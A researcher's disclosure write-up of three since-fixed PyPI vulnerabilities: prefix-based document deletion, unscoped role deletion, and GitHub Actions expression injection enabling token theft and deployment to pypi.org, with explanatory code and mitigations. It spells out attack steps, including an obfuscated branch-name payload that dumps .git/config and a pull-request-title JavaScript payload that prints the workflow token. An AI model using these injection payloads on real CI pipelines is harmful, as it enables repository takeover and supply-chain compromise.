Preface
(A Japanese version of this article is also available.)
While PyPI has a security page, it does not have a clear policy for vulnerability assessments.[1]
This article describes the vulnerabilities that I reported as potential vulnerabilities based on publicly available information. I did not actually exploit or demonstrate them.
This article is not intended to encourage you to perform unauthorized vulnerability assessments.
If you find any vulnerabilities in PyPI, please report them to security@python.org.[2]
TL;DR
There was a vulnerability in a GitHub Actions workflow of PyPI's repository that allowed a malicious pull request to execute arbitrary commands.
This would have allowed an attacker to obtain write permission for the repository, which could lead to arbitrary code execution on pypi.org.
About PyPI
PyPI is the package registry used by Python's package manager (pip), and is referenced when you run commands such as pip install [package name].
Many projects, including Flask and TensorFlow, depend on PyPI directly or indirectly.
Reasons for investigation
While reading Max Justicz's blog post, I noticed that they had reported a vulnerability to PyPI.
After checking the advisory mentioned in the article, I found that PyPI's source code is published on GitHub, so I decided to read it.
Investigation of source code
The current source code of PyPI is in pypa/warehouse repository.
A quick read of the code revealed that it uses a Python web framework called Pyramid.
After reading Pyramid's documentation, I continued reading PyPI's code and found the following two vulnerabilities.
Arbitrary Legacy Document Deletion
PyPI used to have a documentation hosting feature that Python projects could use.
The feature was removed because its usage did not grow, but the existing documents were not deleted.
So, a feature to delete these legacy documents was requested and implemented in this pull request.
Internally, this feature removes the documents with the following code:
import os

# Method of PyPI's S3-backed legacy documentation storage.
# `prefix` receives the name of the project whose documents are deleted.
def remove_by_prefix(self, prefix):
    if self.prefix:
        prefix = os.path.join(self.prefix, prefix)
    keys_to_delete = []
    keys = self.s3_client.list_objects_v2(Bucket=self.bucket_name, Prefix=prefix)
    for key in keys.get("Contents", []):
        keys_to_delete.append({"Key": key["Key"]})
        # Delete in batches of 100 keys
        if len(keys_to_delete) > 99:
            self.s3_client.delete_objects(
                Bucket=self.bucket_name, Delete={"Objects": keys_to_delete}
            )
            keys_to_delete = []
    # Delete whatever is left over from the last batch
    if len(keys_to_delete) > 0:
        self.s3_client.delete_objects(
            Bucket=self.bucket_name, Delete={"Objects": keys_to_delete}
        )
As the snippet above shows, it calls list_objects_v2 with the Prefix parameter to fetch the objects to delete, and the name of a user-owned project is passed as that prefix.
S3 matches Prefix as a plain string prefix, not as a path component, so if someone deleted the legacy documents of a project named examp, the documents of every project whose name starts with examp (e.g. example, exampleasdf) would be deleted as well.
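To make the prefix behavior concrete, here is a minimal Python sketch that emulates S3's Prefix filtering over an in-memory list of keys. The key layout (<project>/<file>) and the helper name matching_keys are assumptions for illustration and are not taken from PyPI's code. Terminating the prefix with the / delimiter is shown as one possible mitigation; it is not necessarily how the issue was actually fixed.

```python
def matching_keys(keys, prefix):
    """Emulate S3 ListObjectsV2 Prefix filtering: a plain string prefix match."""
    return [key for key in keys if key.startswith(prefix)]


# Hypothetical bucket contents laid out as "<project>/<file>".
keys = [
    "examp/index.html",
    "example/index.html",
    "exampleasdf/index.html",
    "other/index.html",
]

# Vulnerable: the bare project name matches every project starting with "examp".
print(matching_keys(keys, "examp"))
# ['examp/index.html', 'example/index.html', 'exampleasdf/index.html']

# Possible mitigation (an assumption): terminate the prefix with the delimiter.
print(matching_keys(keys, "examp/"))
# ['examp/index.html']
```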
Arbitrary Role Deletion
PyPI has a permission management feature for packages.
With this feature, the project owner can grant and remove permissions (roles), and the removal process contained a vulnerability.
When fetching the permission to delete from the database, PyPI used the following code:
# Looks up the role to delete by its ID only; the project is never checked
role = (
    request.db.query(Role)
    .join(User)
    .filter(Role.id == request.POST["role_id"])
    .one()
)
As the snippet above shows, the query filters only by role_id and does not check which project the role belongs to.
Hence, an attacker who could guess a role_id was able to delete the permissions of other projects.[3]
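The following sketch uses an in-memory SQLite table in place of PyPI's database to contrast a lookup by role ID alone with one that is also scoped to the project being managed. The table layout, role IDs, and function names are hypothetical; in the SQLAlchemy query above, the equivalent idea would be an additional filter on the role's project.

```python
import sqlite3

# Hypothetical, simplified roles table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE roles (id TEXT PRIMARY KEY, project TEXT, username TEXT)")
conn.executemany(
    "INSERT INTO roles VALUES (?, ?, ?)",
    [
        ("r1", "attacker-project", "attacker"),
        ("r2", "victim-project", "victim"),
    ],
)


def find_role_unscoped(role_id):
    # Mirrors the vulnerable query: the role is looked up by ID only.
    return conn.execute("SELECT id FROM roles WHERE id = ?", (role_id,)).fetchone()


def find_role_scoped(role_id, project):
    # The role must also belong to the project the requester is managing.
    return conn.execute(
        "SELECT id FROM roles WHERE id = ? AND project = ?", (role_id, project)
    ).fetchone()


# The attacker manages "attacker-project" but submits the victim's role ID.
print(find_role_unscoped("r2"))                    # ('r2',)
print(find_role_scoped("r2", "attacker-project"))  # None
```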
Remote code execution
As mentioned above, I reported two vulnerabilities discovered during the source code investigation.
However, these vulnerabilities have limited impact and could, at best, be used for harassment.
I wanted to report something with more impact, so I decided to look for a vulnerability that could be used to execute arbitrary code.
I read the code of the package upload and project management features, but could not find any vulnerabilities that could lead to arbitrary code execution.
While taking a break, I came across an article titled Unintended Deployments to PyPI Servers.
After reading it carefully, I found that code pushed to the main branch of the pypa/warehouse repository is automatically deployed to pypi.org.
In other words, if I could obtain write permission for this repository, it would be possible to execute arbitrary code on pypi.org.
Therefore, I checked the repository's GitHub Actions workflow files, since workflows have write permission for the repository by default, and found the following vulnerability.
Investigation of the workflow file
In pypa/warehouse, there is a workflow called combine-prs.yml.
This workflow collects pull requests whose branch names start with dependabot and merges them into a single pull request.
Since Dependabot has no feature to merge all of its pull requests at once, they used this workflow to simulate it.
Notably, this workflow does not verify who authored the pull requests.
This means that anyone could create a pull request from a branch whose name starts with dependabot and have this workflow process it.
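A minimal sketch of the selection logic: pull requests are picked by branch name only, and an optional author check shows what was missing. The dictionaries loosely mimic the shape of GitHub REST API pull request objects (head.ref, user.login); treating dependabot[bot] as Dependabot's login and the select_prs helper are assumptions for illustration, not code from combine-prs.yml.

```python
DEPENDABOT_LOGIN = "dependabot[bot]"  # assumed login of the Dependabot account


def select_prs(pulls, check_author=False):
    """Return the numbers of pull requests the combining step would pick up."""
    selected = []
    for pr in pulls:
        # The only check in the vulnerable workflow: the branch name prefix.
        if not pr["head"]["ref"].startswith("dependabot"):
            continue
        # The missing check: who actually opened the pull request.
        if check_author and pr["user"]["login"] != DEPENDABOT_LOGIN:
            continue
        selected.append(pr["number"])
    return selected


# Hypothetical pull requests: one genuine, one from an attacker's fork.
pulls = [
    {"number": 1, "head": {"ref": "dependabot/pip/requests-2.26.0"}, "user": {"login": "dependabot[bot]"}},
    {"number": 2, "head": {"ref": "dependabot-evil"}, "user": {"login": "attacker"}},
]

print(select_prs(pulls))                     # [1, 2]
print(select_prs(pulls, check_author=True))  # [1]
```

Checking the branch name alone is not enough, because anyone who forks the repository can choose any branch name.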
However, this workflow only combines pull requests into a single pull request.
The combined pull request is then reviewed by a human, who would simply discard it if it contained malicious changes.
Therefore, this alone could not be used to execute arbitrary code.
But as I read further through the code, I realized that there was another vulnerability.
In this line, combine-prs.yml prints the list of pull request branches with the following code:
run: |
  echo "${{steps.fetch-branch-names.outputs.result}}"
It's a simple echo command that looks fine at first glance, but it is unsafe because of how GitHub Actions handles expressions.
As described in Keeping your GitHub Actions and workflows secure: Untrusted input, a ${{ }} expression is evaluated and substituted into the script before the script is passed to Bash.
The substitution does not take the surrounding Bash syntax into account, so if steps.fetch-branch-names.outputs.result contains a string like ";curl https://example.com;#, the double quote closes the echo argument, curl https://example.com is executed, and the trailing # turns the rest of the line into a comment.
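The following Python sketch models the expression expansion as a plain string replacement and runs the result in Bash, using a harmless payload (echo INJECTED) instead of curl. It assumes bash is available on PATH, and the expand and run_bash helpers are hypothetical. The last part shows the pattern recommended in GitHub's guidance on untrusted input: pass the value through an environment variable so that Bash only ever treats it as data.

```python
import os
import subprocess

# The step body as written in the workflow, before GitHub expands the expression.
STEP = 'echo "${{steps.fetch-branch-names.outputs.result}}"'
EXPR = "${{steps.fetch-branch-names.outputs.result}}"


def expand(step, value):
    """Model of expression expansion: plain text substitution, no shell quoting."""
    return step.replace(EXPR, value)


def run_bash(script, env=None):
    result = subprocess.run(
        ["bash", "-c", script], capture_output=True, text=True, env=env, check=True
    )
    return result.stdout


# Harmless stand-in for attacker-controlled branch names.
payload = '";echo INJECTED;#'

script = expand(STEP, payload)
print(script)            # echo "";echo INJECTED;#"
print(run_bash(script))  # an empty line, then INJECTED

# Safer pattern: the value arrives via an environment variable and is only
# ever expanded inside double quotes, so it is never parsed as code.
safe_env = {**os.environ, "RESULT": payload}
print(run_bash('echo "$RESULT"', env=safe_env))  # ";echo INJECTED;#
```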
Because this workflow used actions/checkout, which by default persists its credentials in .git/config, that file contains secrets.GITHUB_TOKEN, which has write permission.
So, by executing a command like cat .git/config, it was possible to leak a GitHub access token with write permission for the pypa/warehouse repository.
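To illustrate why reading .git/config is enough, here is a sketch that builds a .git/config modeled on what actions/checkout writes when persist-credentials is left at its default, and then recovers the token from it. The token is fake, and the exact section name and header format are assumptions based on actions/checkout's behavior at the time; setting persist-credentials: false on the checkout step keeps the token out of this file.

```python
import base64
import configparser

FAKE_TOKEN = "ghs_EXAMPLE_NOT_A_REAL_TOKEN"  # hypothetical value

# Hypothetical .git/config with the token stored as a Basic auth extraheader.
header = base64.b64encode(f"x-access-token:{FAKE_TOKEN}".encode()).decode()
git_config = f"""
[core]
\trepositoryformatversion = 0
[http "https://github.com/"]
\textraheader = AUTHORIZATION: basic {header}
"""


def extract_token(config_text):
    """Read the extraheader and decode the token from its Basic auth value."""
    parser = configparser.ConfigParser()
    parser.read_string(config_text)
    value = parser['http "https://github.com/"']["extraheader"]
    encoded = value.split()[-1]  # the base64 part after "basic"
    _user, _, token = base64.b64decode(encoded).decode().partition(":")
    return token


print(extract_token(git_config))  # ghs_EXAMPLE_NOT_A_REAL_TOKEN
```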
As described above, pushing changes to the main branch triggers an automatic deployment to pypi.org.
Hence, it was possible to execute arbitrary code on pypi.org with the following steps:
- Fork pypa/warehouse
- In the forked repository, create a branch with the following name[4]: dependabot;cat$IFS$(echo$IFS'LmdpdA=='|base64$IFS'-d')/config|base64;sleep$IFS'10000';#
- Add a harmless modification to the created branch
- Create a pull request with a harmless title (e.g. WIP)
- Wait for combine-prs.yml to be executed
- A GitHub access token with write permission for pypa/warehouse will be leaked; use it to push an arbitrary modification to the main branch
- The modified code will be deployed to pypi.org
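Git ref names cannot contain spaces (see git check-ref-format), which is presumably why the branch name used above substitutes $IFS for spaces. This sketch checks a subset of the characters git forbids in ref names and decodes the base64 fragment; has_forbidden_chars is a hypothetical helper that covers only part of git's rules.

```python
import base64

# Characters git check-ref-format rejects anywhere in a ref name (subset of the rules).
FORBIDDEN = set(" ~^:?*[\\")


def has_forbidden_chars(name):
    return any(c in FORBIDDEN or ord(c) < 0x20 or ord(c) == 0x7F for c in name)


branch = "dependabot;cat$IFS$(echo$IFS'LmdpdA=='|base64$IFS'-d')/config|base64;sleep$IFS'10000';#"
naive = "dependabot;cat .git/config|base64;sleep 10000;#"

print(has_forbidden_chars(naive))             # True (it contains spaces)
print(has_forbidden_chars(branch))            # False
print(base64.b64decode("LmdpdA==").decode())  # .git
```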
I reported this vulnerability to Python’s security team, and they fixed it in this commit.
(Update: 2021/07/31 12:55 UTC)
@mrtc0 pointed out that the attack procedure above does not work.
After re-checking the steps above, I confirmed that a different attack procedure is necessary.
Sorry, I have a question. In this part of the workflow (https://t.co/zQUi6bw1rC), context.repo.owner contains the owner of the repository that runs the workflow (pypa), so I think the commit would not be found and the workflow would abort. Is that not the case...?
— Kohei MORITA (@mrtc0) July 31, 2021
Line 119 of combine-prs.yml contains the following code:
script: |
  const prString = `${{ steps.fetch-branch-names.outputs.prs-string }}`;
As mentioned earlier, a ${{ }} expression is substituted without regard to the surrounding context.
So, if steps.fetch-branch-names.outputs.prs-string contains a string like `;console.log("test")//, the backtick closes the template literal, console.log("test") is executed, and // comments out the rest of the line.
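The same substitution problem can be sketched in Python: the first function models the expansion into the github-script body, and the second is a hypothetical safer variant that emits the value as a JSON string literal, which JavaScript parses as an ordinary string. In a real workflow, GitHub's guidance is instead to pass the value through an environment variable and read it from process.env in the script; this sketch only illustrates why the quoting context matters.

```python
import json

# The github-script body before GitHub expands the expression.
STEP = "const prString = `${{ steps.fetch-branch-names.outputs.prs-string }}`;"
EXPR = "${{ steps.fetch-branch-names.outputs.prs-string }}"


def expand(value):
    """Plain text substitution, unaware that the result is JavaScript."""
    return STEP.replace(EXPR, value)


def expand_as_json_literal(value):
    """Hypothetical safer variant: emit the value as a JSON (and thus JS) string literal."""
    return "const prString = " + json.dumps(value) + ";"


payload = '`;console.log("test")//'

print(expand(payload))
# const prString = ``;console.log("test")//`;
print(expand_as_json_literal(payload))
# const prString = "`;console.log(\"test\")//";
```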
Since steps.fetch-branch-names.outputs.prs-string contains pull request titles, it was possible to execute arbitrary code on pypi.org with the following attack procedure:
- Fork pypa/warehouse
- Find a branch in pypa/warehouse whose name starts with dependabot
- In the forked repository, add a harmless modification to the branch found in the previous step
- Create a pull request titled `;github.auth().then(auth=>console.log(auth.token.split("")))//
- Wait for combine-prs.yml to be executed
- A GitHub access token with write permission for pypa/warehouse will be leaked; use it to push an arbitrary modification to the main branch
- The modified code will be deployed to pypi.org
Conclusion
The vulnerabilities described in this article had a significant impact on the Python ecosystem.
As I’ve mentioned several times before, some supply chains have critical vulnerabilities.
However, only a limited number of people research supply chain attacks, and most supply chains are not properly protected.
Therefore, I believe that users who depend on the supply chain need to actively contribute to improving its security.
If you have any questions / comments about this article, please send a message to @ryotkak on Twitter.
Timeline
Date (UTC) | Event |
---|---|
July 25, 2021 | Found / Reported document deletion vulnerability |
July 26, 2021 | Fixed document deletion vulnerability |
July 26, 2021 | Found / Reported role deletion vulnerability |
July 27, 2021 | Found / Reported combine-prs vulnerability |
July 27, 2021 | Fixed role deletion vulnerability |
July 27, 2021 | Fixed combine-prs vulnerability |
July 29, 2021 | Published the advisory |
July 30, 2021 | Published this article |
[1] They plan to improve the security page: https://github.com/pypa/warehouse/issues/7970
[2] Reference: Reporting a security issue
[3] As a side note, I thought that role_id was a sequential number and told them "it's possible to spray the ID", but it was in fact a UUID.
[4] This branch name will execute cat .git/config | base64; sleep 10000 if it is executed in Bash.